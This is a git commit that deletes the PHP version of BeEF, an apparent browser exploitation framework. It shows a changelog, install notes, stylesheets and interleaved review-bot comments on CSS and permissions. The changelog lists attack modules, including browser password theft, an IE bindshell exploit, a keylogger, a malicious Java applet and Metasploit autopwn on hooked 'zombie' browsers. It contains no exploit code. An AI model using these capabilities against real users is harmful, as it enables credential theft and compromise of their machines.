Moving the PHP trunk to /branches/PHPBeEF/

git-svn-id: https://beef.googlecode.com/svn/trunk@502 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
scotty.b.brown
2010-11-11 09:13:03 +00:00
parent eb184fa943
commit 8d073f8738
204 changed files with 0 additions and 18946 deletions

133
CHANGELOG
View File

@@ -1,133 +0,0 @@
Version 0.4.0.3
All '<?' changed to '<?php'
Version 0.4.0.2
Firefox password manager theft added
Version 0.4.0.1
Example (example.php) hardcoded path bug fixed
Version 0.4.0.0
Minor Aesthetic Updates
Version 0.3.3.8
Metasploit redirect delay increased
URL filter bug fixed
Module nsl_process_xpcom updated
Version 0.3.3.7
Menu items updated
Network Modules menu added
Inter-protocol Module menu combined with Network Modules menu
Filtering increased
Version 0.3.3.6
XML RPC support added (/include/xmlrpc.inc.php)
Integration with Metasploit added
MSF Browser Exploit module added
MSF SMB challange capture added
Another Autopwn module added (this one using XML RPC)
Version 0.3.3.5
Module torenabled added
Logs moved to cache directory
Verison 0.3.3.4
UXL support added to beefmagic.js.php
Version 0.3.3.3
Module internal ip added
Module internal hostname added
Module nsl_process_xpcom added
Autorun changed to post
Delay (2 second) added to autorun
beefmagic.js.php updated for firefox chrome zone support
Version 0.3.3.2
example.html changed to example.php
Malicious java applet module added
Module code/data sent in post
Visit module additional urls added
malicious_msf_applet added
StripSlashes removed from send_code()
Module smbenum added
Version 0.3.3.1
vmdetect module updated to use Java
vtiger upload exploit module added
browser dos fun module added
msf auto pwn module added
Base64 bug in send_cmds fixed
Ajax.Updater bug work-around in zombie send_code()
Version 0.3.3
Logging functionality added
URL append / bug fix
xss-example.htm renamed to example.htm
Menu item for 'Spawn Zombie Window' added
Menu items for log management added
Zombie html content hidden by default
Zombie html content unsafe viewing added
Zombie html content display slash removal
Modules can now be set as autorun and send code
Autorun modules can now return results
index.php deleted from the hook directory
CSS added for Safari and IE8
Log panel added to main view
Prompt modules added
Redirect modules added
Statusbar module added
Prompt module added
Chrome detected as zombie
Version 0.3.2.2
CVE-2009-0075 autorun module added (IE XP SP2 bindshell)
Version 0.3.2.1.1
This changelog file added
Version 0.3.2.1
Zombie results now append rather than over write
Safari cache work around added
Autorun JS with useragent regexp added
Flash enabled module added
Java enabled module added
CVE-2009-0075 module added (IE XP SP2 bindshell)
CVE-2009-0137 module added (Safari File Snatching)
mob018 module moved to CVE-2009-3730 for consistency
Version 0.3.1.6
Inter-Protocol Communication Module Example
Inter-Protocol Exploition Module Example
Browser Exploit Module Example
Minor Updates
Version 0.3.1.5
CSS Bug Fix
Version 0.3.1.4
BeEF Module Bug Fix
PHP4 Bug Fix
Version 0.3.1.3
Installation Bug Fix
Version 0.3.1.2
Installation Functionality added
PHP 4 bug fix
Version 0.3.1.1
Added w3c compliance
Debug console bug fixed
Version 0.3.1
UI Changes
Zombie specifics added: key logger, content and browser details
Autorun Modules added
Distributed Module Support Added: distributed port scanner
Fine grain control over which zombie a module will send code (sidebar zombies).
Version 0.2.1
PHP 4 bugs fixed

View File

@@ -1,4 +0,0 @@
Browse to <site>/beef/ and follow the instructions
Don't forget to chown the beef directory and its contents
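Review bot: The second line of these install notes tells the user to chown the beef directory and its contents without naming the owner or the mode. If the intended owner is the web server account (an assumption, the file does not say), that makes every PHP file in the tree writable by the process that serves it. The instructions should name the owner and limit write access to the directories that need it, such as the cache directory the changelog says the logs were moved to.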

View File

@@ -1 +0,0 @@
0.4.0.3

View File

@@ -1,120 +0,0 @@
div.menu {
padding: 0px;
padding-bottom: 6px;
margin: 0px;
width: 100%;
height: 1.5em;
position: relative;
font-size: 150%;
font-weight: bold;
z-index: 1;
border : 1px solid #cccccc;
background-color: transparent;
margin-bottom: 0px;
text-align: right;
}
div.menu ul {
padding: 0px;
margin: 0px;
list-style-type: none;
font-size: inherit;
border: 0px;
margin-top: 2px;
}
div.menu li {
float: left;
padding-right: 0px;
position: relative;
z-index: 11;
margin-left: 10px;
}
div.menu ul ul {
visibility: hidden;
position: absolute;
height: 0px;
top: 1.5em; /* must be <= div.menu>a height */
}
div.menu ul li a {
border: 1px solid #ffffff;
text-align: left;
}
div.menu ul ul a:visited {
height: auto;
min-width: 16em; /* dropdown width*/
background-color: #ffffff;
}
div.menu a {
padding: 0px;
padding-left: 3px;
padding-right: 4px;
display: block;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration: none;
background: #ffffff;
background-color: transparent;
}
div.menu a:visited {
padding: 0px;
padding-left: 3px;
display: block;
min-width: 1.5em; /* changes width */
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration:none;
}
div.menu a:focus {
padding: 0px;
padding-left: 3px;
display: block;
min-width: 11.5em;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration: none;
}
div.menu a:hover {
min-width: 16em;
}
div.menu ul li a:hover {
background: #cccccc;
min-width: 1em;
border: 1px solid #ffffff;
}
div.menu ul li a:visited {
min-width: 1em;
border: 1px solid #ffffff;
}
div.menu ul li ul a:hover {
background: #cccccc;
min-width: 16em;
}
div.menu ul li ul {
background: #cccccc;
min-width: 16em;
}
div.menu ul li:hover ul, div.menu ul a:hover ul {
visibility: visible;
width: 16em;
}
div.menu div a:hover {
background: #ffffff;
}
div.menu ul li ul li{ /* zombies menu */
border: 0.5px solid #cccccc;
margin-left: 0px;
width: 17em;
background-color: #ffffff;
}
div.menu ul li ul{
width: 16em;
}
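Review bot: `div.menu ul li ul` is declared twice in this file, once with `background: #cccccc; min-width: 16em;` and again as the last rule with `width: 16em;`, so the effective width depends on rule order; merge them into one rule. In `div.menu a`, `background: #ffffff;` is overridden two lines later by `background-color: transparent;` and can be dropped, and `border: 0.5px solid #cccccc;` on the zombies menu items is rounded differently across browsers, so `1px` is the safer value.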

View File

@@ -1,461 +0,0 @@
/* BODY */
body {
background-color: white;
width: 990px;
margin-top: 10px;
margin-bottom: 10px;
margin-right: 10px;
color: #333;
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
}
#autorun_dyn {
text-align: center
}
/* MAIN */
#main {
position: static;
width: 534px;
padding-left: 178px;
margin-right: 0px;
padding-right: 0px;
margin-top: 0px;
}
#bottom {
position: relative;
margin-top: 0px;
}
/* PAGE HEADER */
#pageheader {
margin-top: 0px;
padding: 0px;
padding-bottom: 5px;
font-size: 45%;
}
#pageheader a {
text-decoration: none;
color: #000000;
}
/* BUTTONS */
#page .button {
width: 8em;
background: #FFFFFF;
}
#sidebar .button {
width: 100%;
background: #FFFFFF;
padding: 0;
margin: 1px;
}
/* LOG SIDEBAR */
#logsidebar {
position: absolute;
left: 728px;
width: 250px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#logsidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
#logsidebar a {
color: rgb(204, 204, 204);
display: inline;
font-size: 11px;
height: 0px;
margin-right: 0px;
margin-top: 0px;
padding-bottom: 10px;
padding-left: 0px;
padding-right: 0px;
padding-top: 0px;
text-decoration: none;
width: 0px;
text-align: center
}
#logdyn {
font-size: 11px;
overflow: auto;
height: 490px;
}
#log_header {
margin-bottom: 10px;
}
/* SIDEBAR */
#sidebar {
position: absolute;
width: 150px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#sidebar textarea, #sidebar input, #sidebar select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#sidebar a:link {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#sidebar #content {
background-color: transparent;
font-size: 80%;
}
#sidebar h1 {
font-size: x-large;
text-align: center;
margin-top: 5px;
margin-bottom: 15px;
padding-top: 2px;
}
#sidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
/* PAGE */
#section {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
/* PAGE */
#newpage {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
font-size: 80%;
}
#section_title {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
#section_content {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
background-color: #ccc;
}
/* PAGE */
#page {
margin-top: 0px;
margin-right: -2px;
border: 1px solid #ccc;
padding: 10px;
padding-top: 0px;
font-size: 80%;
height: 550px;
overflow: auto;
}
#page textarea, #page input, #page select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#page #content {
background-color: transparent;
}/*
#page p {
margin-top: 0;
}
#page h2 {
font-size: large;
text-align: center;
border-bottom: 1px solid #ccc;
padding-bottom: 2px;
}
#page h3 {
text-align: center;
padding-top: 10px;
margin: 0px;
font-size: 100%;
}
/* DYNAMIC ZOMBIE SECTION */
#zombies {
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
width: 130px;
}
#zombies p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombies img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
/* SELECTED DYNAMIC ZOMBIE SECTION */
#zombiessel {
background-color: #ccc;
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
}
#zombiessel p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombiessel img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
#zombiesdyn {
text-align: center;
overflow-y: auto;
overflow-x: hidden;
height: 350px;
}
#module_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#module_subsection {
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 10px;
padding-left: 5px;
padding-top: 0px;
padding-bottom: 0px;
font-size: 100%;
}
/* BUTTONS */
#module_subsection .button {
width: 8em;
background: #FFFFFF;
}
#module_subsection textarea {
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
width: 100%;
font-size: 80%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection input, #module_subsection select {
/* font-weight: bold; */
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
/* display: inline; */
}
#zombie_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#zombie_subsection {
/* font-weight: bold; */
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 0px;
padding-left: 5px;
padding-top: 0px;
font-size: 100%;
}
#zombie_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
display: inline;
}
#zombie_header a {
display: inline;
text-decoration: none;
/* font-weight: none; */
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* color: #FF0000; */
color: #CCCCCC;
font-size: 60%;
}
#zombie_subsection textarea, #zombie_subsection input, #zombie_subsection select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#zombie_page_title {
font-weight: bold;
text-align: left;
padding-top: 100px;
margin-top: 100px;
font-size: 180%;
}
/* ZOMBIE TEXT - on buttons*/
#zombietext {
color: black;
font-size: 110%;
padding-top: 10px;
margin-top: -27px;
margin-left: 5px;
}
/* GENERAL CONTENT (HELP, ETC) */
DIV.entry {
margin-bottom: 10px;
}
DIV.entry P {
margin: 0;
}
DIV.entry P.title {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
DIV.entry a {
text-decoration: none;
color: #FF0000;
}
#credits {
float: right;
position: static;
margin-right: 10px;
margin-top: -24px;
font-size: 70%;
text-decoration: none;
color: #FF0000;
font-weight: bold;
z-index: 40;
}
#credits a {
color: #FF0000;
text-decoration: none;
z-index: 40;
}
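Review bot: The `}/*` that closes `#page #content` opens a comment that is not terminated until the `*/` of the `/* DYNAMIC ZOMBIE SECTION */` banner, so the `#page p`, `#page h2` and `#page h3` rules in between are never applied. If they are meant to be disabled, wrap them in an explicit comment with its own closing `*/`; otherwise remove the stray `/*`.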

View File

@@ -1,68 +0,0 @@
/*
* no > selectors are used, 'cause some browsers are too stupid
*/
div.menu {
padding: 3px;
margin: 0px;
width: 99%;
height: 1.5em;
border: 1px solid #cccccc;
position: relative;
font-size: 150%;
font-weight: bold;
background: transparent;
z-index: 1;
}
div.menu ul {
padding: 0px;
margin: 0px;
list-style-type:none;
font-size: inherit;
}
div.menu li {
float: left;
min-width: 1em;
position: relative;
z-index: 11;
}
div.menu ul ul {
visibility: hidden;
min-width: 12em;
position: absolute;
height: 0px;
top: 1.5em; /* must be <= div.menu>a height */
}
div.menu a {
padding: 0px;
padding-left: 3px;
padding-right: 10px;
padding-left: 3px;
display: block;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration:none;
background: #eeeeee;
}
div.menu a:hover {
background: #cccccc;
}
div.menu ul li a {
background: #FFFFFF;
}
div.menu ul li a:hover {
background: #cccccc;
}
div.menu ul li ul li a:hover {
background: #cccccc;
}
div.menu ul li ul li a {
min-width: 17em;
border: 1px solid #cccccc;
margin-left: 0px;
background: #ffffff;
}
div.menu ul li:hover ul, div.menu ul a:hover ul {
visibility: visible;
}
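Review bot: In `div.menu a`, `padding-left: 3px;` appears twice, before and after `padding-right: 10px;`; the second copy is redundant and should be removed.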

View File

@@ -1,471 +0,0 @@
/* BODY */
body {
background-color: white;
width: 990px;
margin-top: 10px;
margin-bottom: 10px;
margin-right: 10px;
color: #333;
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
}
#autorun_dyn {
text-align: center
}
/* MAIN */
#main {
position: static;
width: 530px;
padding-left: 178px;
margin-right: 0px;
padding-right: 0px;
margin-top: 0px;
}
#bottom {
position: relative;
margin-top: 0px;
}
/* PAGE HEADER */
#pageheader {
margin-top: 0px;
padding: 0px;
padding-bottom: 5px;
font-size: 45%;
z-index:-1;
}
#pageheader a {
text-decoration: none;
color: #000000;
}
/* BUTTONS */
#page .button {
width: 8em;
background: #FFFFFF;
}
#sidebar .button {
width: 100%;
background: #FFFFFF;
padding: 0;
margin: 1px;
}
/* LOG SIDEBAR */
#logsidebar {
position: absolute;
left: 724px;
width: 250px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
}
#logsidebar h2 {
font-size: large;
text-align: center;
margin-top: 0px;
margin-bottom: 0px;
padding-top: 0px;
}
#logsidebar a {
color: rgb(204, 204, 204);
display: inline;
font-size: 9px;
height: 0px;
margin-right: 0px;
margin-top: 0px;
padding-bottom: 10px;
padding-left: 0px;
padding-right: 0px;
padding-top: 0px;
text-decoration: none;
width: 0px;
text-align: center
}
#log_header {
margin-bottom: 10px;
padding-top: 10px;
}
#logdyn {
font-size: 9px;
overflow: auto;
height: 500px;
}
#logsidebar_heading, #logsidebar_heading a {
text-decoration: none;
font-size: 75%;
color: #000000;
text-align: center
}
/* SIDEBAR */
#sidebar {
position: absolute;
width: 150px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#sidebar textarea, #sidebar input, #sidebar select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#sidebar a:link {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#sidebar #content {
background-color: transparent;
font-size: 80%;
}
#sidebar h1 {
font-size: x-large;
text-align: center;
margin-top: 5px;
margin-bottom: 15px;
padding-top: 2px;
}
#sidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
/* PAGE */
#section {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
/* PAGE */
#newpage {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
font-size: 80%;
}
#section_title {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
#section_content {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
background-color: #ccc;
}
/* PAGE */
#page {
margin-top: 0px;
margin-right: -2px;
border: 1px solid #ccc;
padding: 10px;
padding-top: 0px;
font-size: 80%;
height: 550px;
overflow: auto;
}
#page textarea, #page input, #page select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#page #content {
background-color: transparent;
}/*
#page p {
margin-top: 0;
}
#page h2 {
font-size: large;
text-align: center;
border-bottom: 1px solid #ccc;
padding-bottom: 2px;
}
#page h3 {
text-align: center;
padding-top: 10px;
margin: 0px;
font-size: 100%;
}
/* DYNAMIC ZOMBIE SECTION */
#zombies {
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
width: 130px;
}
#zombies p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombies img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
/* SELECTED DYNAMIC ZOMBIE SECTION */
#zombiessel {
background-color: #ccc;
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
}
#zombiessel p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombiessel img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
#zombiesdyn {
text-align: center;
overflow-y: auto;
overflow-x: hidden;
height: 355px;
}
#module_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#module_subsection {
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 10px;
padding-left: 5px;
padding-top: 0px;
padding-bottom: 0px;
font-size: 100%;
}
/* BUTTONS */
#module_subsection .button {
width: 8em;
background: #FFFFFF;
}
#module_subsection textarea {
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
width: 100%;
font-size: 80%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection input, #module_subsection select {
/* font-weight: bold; */
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
/* display: inline; */
}
#zombie_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#zombie_subsection {
/* font-weight: bold; */
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 0px;
padding-left: 5px;
padding-top: 0px;
font-size: 100%;
}
#zombie_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
display: inline;
}
#zombie_header a {
display: inline;
text-decoration: none;
/* font-weight: none; */
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* color: #FF0000; */
color: #CCCCCC;
font-size: 60%;
}
#zombie_subsection textarea, #zombie_subsection input, #zombie_subsection select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#zombie_page_title {
font-weight: bold;
text-align: left;
padding-top: 100px;
margin-top: 100px;
font-size: 180%;
}
/* ZOMBIE TEXT - on buttons*/
#zombietext {
color: black;
font-size: 110%;
padding-top: 10px;
margin-top: -27px;
margin-left: 5px;
}
/* GENERAL CONTENT (HELP, ETC) */
DIV.entry {
margin-bottom: 10px;
}
DIV.entry P {
margin: 0;
}
DIV.entry P.title {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
DIV.entry a {
text-decoration: none;
color: #FF0000;
}
#credits {
float: right;
position: static;
margin-right: 10px;
margin-top: -24px;
font-size: 70%;
text-decoration: none;
color: #FF0000;
font-weight: bold;
z-index: 40;
}
#credits a {
color: #FF0000;
text-decoration: none;
z-index: 40;
}
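Review bot: `z-index:-1;` in `#pageheader` has no effect because the rule declares no `position`, and z-index only applies to positioned elements. Either add `position: relative;` if the header is meant to sit behind the menu, or drop the declaration.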

View File

@@ -1,70 +0,0 @@
/*
* no > selectors are used, 'cause some browsers are too stupid
*/
div.menu {
padding: 3px;
margin: 0px;
width: 99%;
height: 1.5em;
border: 1px solid #cccccc;
position: relative;
font-size: 150%;
font-weight: bold;
background: transparent;
z-index: 1;
}
div.menu ul {
padding: 0px;
margin: 0px;
list-style-type:none;
font-size: inherit;
}
div.menu li {
float: left;
min-width: 1em;
position: relative;
z-index: 11;
background: transparent;
}
div.menu ul ul {
visibility: hidden;
min-width: 12em;
position: absolute;
height: 0px;
top: 1.5em; /* must be <= div.menu>a height */
}
div.menu ul ul a, div.menu ul ul a:visited {
height: auto;
}
div.menu a, div.menu a:visited, div.menu a:focus {
padding: 0px;
padding-left: 3px;
padding-right: 10px;
display: block;
min-height: 1.5em;
line-height: 1.4em;
z-index: 11;
text-decoration:none;
background: white;
}
div.menu a:hover {
background: #cccccc;
}
div.menu ul li a:hover {
background: #cccccc;
}
div.menu ul li a {
background: #FFFFFF;
}
div.menu ul li ul li a {
min-width: 17em;
border: 1px solid #cccccc;
margin-left: 0px;
background: #FFFFFF;
}
div.menu ul li:hover ul, div.menu ul a:hover ul {
visibility: visible;
}

View File

@@ -1,478 +0,0 @@
/* BODY */
body {
background-color: white;
width: 990px;
margin-top: 10px;
margin-bottom: 10px;
margin-right: 10px;
color: #333;
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
align: center;
}
#autorun_dyn {
text-align: center
}
/* MAIN */
#main {
position: static;
width: 530px;
padding-left: 178px;
margin-right: 0px;
padding-right: 0px;
margin-top: 0px;
}
#bottom {
position: relative;
margin-top: 0px;
}
/* PAGE HEADER */
#pageheader {
margin-top: 0px;
padding: 0px;
padding-bottom: 5px;
font-size: 45%;
}
#pageheader a {
text-decoration: none;
color: #000000;
}
/* BUTTONS */
#page .button {
width: 8em;
background: #FFFFFF;
}
#sidebar .button {
width: 100%;
background: #FFFFFF;
padding: 0;
margin: 1px;
}
/* LOG SIDEBAR */
#logsidebar {
position: absolute;
left: 724px;
width: 250px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
}
#logsidebar h2 {
font-size: large;
text-align: center;
margin-top: 0px;
margin-bottom: 0px;
padding-top: 0px;
}
#logsidebar a {
color: rgb(204, 204, 204);
display: inline;
font-size: 11px;
height: 0px;
margin-right: 0px;
margin-top: 0px;
padding-bottom: 10px;
padding-left: 0px;
padding-right: 0px;
padding-top: 0px;
text-decoration: none;
width: 0px;
text-align: center
}
#log_header {
margin-bottom: 10px;
padding-top: 10px;
}
#logdyn {
font-size: 9px;
overflow: auto;
height: 500px;
}
#logsidebar_heading, #logsidebar_heading a {
text-decoration: none;
font-size: 75%;
color: #000000;
text-align: center
}
/* SIDEBAR */
#sidebar {
position: absolute;
width: 150px;
margin: 0px;
border: 1px solid #ccc;
margin-right: 5px;
margin-bottom: 10px;
padding: 10px;
padding-top: 0px;
height: 550px;
overflow: hidden;
}
#sidebar textarea, #sidebar input, #sidebar select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#sidebar a:link {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#beefheading a {
text-decoration: none;
font-size: 75%;
color: #FF0000;
text-align: center
}
#sidebar #content {
background-color: transparent;
font-size: 80%;
}
#sidebar h1 {
font-size: x-large;
text-align: center;
margin-top: 5px;
margin-bottom: 15px;
padding-top: 2px;
}
#sidebar h2 {
font-size: large;
text-align: center;
margin-top: 5px;
margin-bottom: 1px;
padding-top: 2px;
}
/* PAGE */
#section {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
/* PAGE */
#newpage {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
font-size: 80%;
}
#section_title {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
}
#section_content {
margin: 1px;
border: 1px solid #ccc;
padding: 1px;
padding-top: 0px;
background-color: #ccc;
}
/* PAGE */
#page {
margin-top: 0px;
margin-right: -2px;
border: 1px solid #ccc;
padding: 10px;
padding-top: 0px;
font-size: 80%;
height: 550px;
overflow: auto;
}
#page textarea, #page input, #page select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#page #content {
background-color: transparent;
}/*
#page p {
margin-top: 0;
}
#page h2 {
font-size: large;
text-align: center;
border-bottom: 1px solid #ccc;
padding-bottom: 2px;
}
#page h3 {
text-align: center;
padding-top: 10px;
margin: 0px;
font-size: 100%;
}
/* DYNAMIC ZOMBIE SECTION */
#zombies {
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
width: 130px;
}
#zombies p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombies img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
/* SELECTED DYNAMIC ZOMBIE SECTION */
#zombiessel {
background-color: #ccc;
text-align: left;
vertical-align: -30px;
height: 15px;
font-size: 110%;
padding: 0;
margin:0;
padding-top: 0px;
margin-bottom: 2px;
border: 1px solid #ccc;
margin-right: -1px;
margin-left: 1px;
}
#zombiessel p {
vertical-align: -10px;
margin:0px;
padding: 0px;
}
#zombiessel img {
text-align: left;
vertical-align: -1px;
padding: 1px;
margin:0;
padding-top: 0px;
padding-left: 2px;
margin-bottom: 1px;
margin-top: 1px;
margin-left: 1px;
}
#zombiesdyn {
text-align: center;
overflow-y: auto;
overflow-x: hidden;
height: 355px;
}
#module_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#module_subsection {
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 10px;
padding-left: 5px;
padding-top: 0px;
padding-bottom: 0px;
font-size: 100%;
}
/* BUTTONS */
#module_subsection .button {
width: 8em;
background: #FFFFFF;
}
#module_subsection textarea {
font-family: Lucida Grande, Bitstream Vera Sans, Verdana, sans-serif;
width: 100%;
font-size: 80%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection input, #module_subsection select {
/* font-weight: bold; */
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#module_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
/* display: inline; */
}
#zombie_header {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
#zombie_subsection {
/* font-weight: bold; */
margin-top: 0px;
margin-right: 0px;
border: 1px solid #ccc;
padding: 0px;
padding-left: 5px;
padding-top: 0px;
font-size: 100%;
}
#zombie_subsection_header {
font-weight: bold;
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* font-size: 120%; */
display: inline;
}
#zombie_header a {
display: inline;
text-decoration: none;
/* font-weight: none; */
margin-top: 0px;
margin-right: 0px;
padding: 0px;
padding-left: 0px;
padding-top: 0px;
/* color: #FF0000; */
color: #CCCCCC;
font-size: 60%;
}
#zombie_subsection textarea, #zombie_subsection input, #zombie_subsection select {
width: 100%;
margin: 5px 0;
padding: 1px;
border: #CCCCCC 1px solid;
}
#zombie_page_title {
font-weight: bold;
text-align: left;
padding-top: 100px;
margin-top: 100px;
font-size: 180%;
}
/* ZOMBIE TEXT - on buttons*/
#zombietext {
color: black;
font-size: 110%;
padding-top: 10px;
margin-top: -27px;
margin-left: 5px;
}
/* GENERAL CONTENT (HELP, ETC) */
DIV.entry {
margin-bottom: 10px;
}
DIV.entry P {
margin: 0;
}
DIV.entry P.title {
font-size: large;
font-weight: bold;
text-align: left;
padding-top: 10px;
margin: 0px;
}
DIV.entry a {
text-decoration: none;
color: #FF0000;
}
#credits {
float: right;
position: static;
margin-right: 10px;
margin-top: -24px;
font-size: 70%;
text-decoration: none;
color: #FF0000;
font-weight: bold;
z-index: 40;
}
#credits a {
color: #FF0000;
text-decoration: none;
z-index: 40;
}
